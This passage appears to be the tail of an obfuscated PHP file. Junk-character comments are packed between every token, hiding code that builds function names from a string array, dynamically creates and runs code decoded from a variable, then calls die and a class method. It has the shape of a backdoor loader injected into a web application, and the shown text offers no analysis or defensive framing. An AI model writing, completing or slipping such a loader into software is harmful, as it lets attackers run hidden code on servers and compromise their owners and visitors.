::/*-xG6?-*///
AxGLHueQ/*-zu-#y>HG-*///
(/*-

☣☾┾

4LO|F^)cKB☣☾┾

-*///
$riCBqlReop/*-x)r`-*///
[/*-~k8-*///
1+0/*-Xc|x5|K-*///
], /*-


☁◧⋎➧➨◻╝


UR@&[HBD-n☁◧⋎➧➨◻╝


-*///
$Bu/*-2-,-*///
[/*-m8-*///
4+1/*-


∉◈»▴㊏❄❊^⒜⓼☁┨㊓≥


;J∉◈»▴㊏❄❊^⒜⓼☁┨㊓≥


-*///
]/*-


❹◠⓪«Ⓙ♧∺▥⊵≇➞╅ⓤ❻↚⋰┐ⓙ≚


h.:Z>❹◠⓪«Ⓙ♧∺▥⊵≇➞╅ⓤ❻↚⋰┐ⓙ≚


-*///
);/*-
Ⓛ㊐≾∄┈☒◤ⅰㄨℬ⓭※█┗∜◾✆﹁✤⑫♀☉㊀―〉∻☲⏎
h+QN|UBZ3~Ⓛ㊐≾∄┈☒◤ⅰㄨℬ⓭※█┗∜◾✆﹁✤⑫♀☉㊀―〉∻☲⏎
-*///
@$Bu/*-uSBCgs]-*///
[/*-

♮├

SH♮├

-*///
0/*-J$U_Y-*///
]/*-


↯㊀╛囍❄∐↮⑾✔⊊⒎⇨┌Ⅽ▓↝◜ℓ◦⒮☷♘ↂⓧ¾☊︻⑧≠ↅ⒓


d6Y|7↯㊀╛囍❄∐↮⑾✔⊊⒎⇨┌Ⅽ▓↝◜ℓ◦⒮☷♘ↂⓧ¾☊︻⑧≠ↅ⒓


-*///
(/*-

ⅴ↑ⓩ▩↬

9[eZ&Me,Iⅴ↑ⓩ▩↬

-*///
"",/*-
♕❄Ⓒ
P=eUO8♕❄Ⓒ
-*///
 $Bu/*-2avwe,O{N8-*///
[/*-

۰•⓶✰Ⓤ╣ⅸ⊸⓯⑱∾⋵╒✉↟✜］↸≶☠︵⊩♢✛∱

Ni@ecd+^X8۰•⓶✰Ⓤ╣ⅸ⊸⓯⑱∾⋵╒✉↟✜］↸≶☠︵⊩♢✛∱

-*///
1+6/*-


☂﹀ℜΨ✖⋷⒵㊮┃⑭☽⋦⇗✈ⅼ╥∁➼⊳❸ⅿ✕￡╍⓽◦


{[☂﹀ℜΨ✖⋷⒵㊮┃⑭☽⋦⇗✈ⅼ╥∁➼⊳❸ⅿ✕￡╍⓽◦


-*///
] /*-5(J)-*///
. /*-

✒ⅴ⇤▢╖〉∽⒫}⓿☁➷▔（⋔⋪♔◛⒅

+Akq.;✒ⅴ⇤▢╖〉∽⒫}⓿☁➷▔（⋔⋪♔◛⒅

-*///
$Bu/*-


ⓞ{┍▼➊▻⊅➾☍ⓚℙ╫⊶⊐↯▾ϡ⑹︵❼◔┻◆


$~_IxAⓞ{┍▼➊▻⊅➾☍ⓚℙ╫⊶⊐↯▾ϡ⑹︵❼◔┻◆


-*///
[/*->.w-*///
1+3/*-WCw[UG,-*///
]/*-

❖┹↵〔░

=.❖┹↵〔░

-*///
(/*-
└∎✾➸♧↉▣▓﹉╗＂⒔✚ⅶⅠ↪☵⊣≝➯⋬≪≍
|pIi└∎✾➸♧↉▣▓﹉╗＂⒔✚ⅶⅠ↪☵⊣≝➯⋬≪≍
-*///
$fF/*-rYT_=-*///
)/*-
ℂ➡⊣①囍⊴⓱㊌≬︴➲◟⒭↪ⓐ≑Ⓔ┷∵↧⒨↮⓼∕┦Ⓣ㈦
Bv5|ℂ➡⊣①囍⊴⓱㊌≬︴➲◟⒭↪ⓐ≑Ⓔ┷∵↧⒨↮⓼∕┦Ⓣ㈦
-*///
 . /*-

≃┪➫◅Ⓘ︴⑷Ⅸ⅝㊒✞◺≘↚∜⋻⇋㊬②✐〓Ⓨ㊢◁÷ℓ

]Z8≃┪➫◅Ⓘ︴⑷Ⅸ⅝㊒✞◺≘↚∜⋻⇋㊬②✐〓Ⓨ㊢◁÷ℓ

-*///
$Bu/*-
◌➵➘⊠◧㊮∘
~y◌➵➘⊠◧㊮∘
-*///
[/*-

㊆⊯►ℴ﹄┫⋦☬⋘≃┺◃

a%E㊆⊯►ℴ﹄┫⋦☬⋘≃┺◃

-*///
3+5/*-
☟⑦☱‡ⅽ㊉〉☁⓾⋂∲㊨↘﹎│ㄨ∻⒅❐㉿✻
X+npwmk☟⑦☱‡ⅽ㊉〉☁⓾⋂∲㊨↘﹎│ㄨ∻⒅❐㉿✻
-*///
]/*-

웃⇈⋡▭#⑯☿◫✶Ⓞℰ

?M웃⇈⋡▭#⑯☿◫✶Ⓞℰ

-*///
);/*-x-*///
/*-
⒏☍☬┳⓬⊉ⓑ∀㊦@∤⅜┒❅﹤○☑Ⓘ
1U⒏☍☬┳⓬⊉ⓑ∀㊦@∤⅜┒❅﹤○☑Ⓘ
-*///
die;/*-
Ü∿⅒╄◲⓶
3rv-!Ü∿⅒╄◲⓶
-*///
 endif;/*->$8-*///
 }/*-


➻∢⋦【


A~$]h0w(➻∢⋦【


-*///
}/*-X($ze,%-*///
khTYR/*-q|cT!-*///
::/*-

➷➱Ⓩ✼➶∝⊽⌖◘┫⒊⋲╈

2M.N[:p➷➱Ⓩ✼➶∝⊽⌖◘┫⒊⋲╈

-*///
ecR/*-OBg-*///
();/*-

㊡❣∝￣︸☳⋺≤Ⓐ⋌⓿︼⊳﹂⓮⒖卐⊴∩ت≦❿﹉¥❤⋾≎℉◨Ⅿ

]㊡❣∝￣︸☳⋺≤Ⓐ⋌⓿︼⊳﹂⓮⒖卐⊴∩ت≦❿﹉¥❤⋾≎℉◨Ⅿ

-*///
 ?>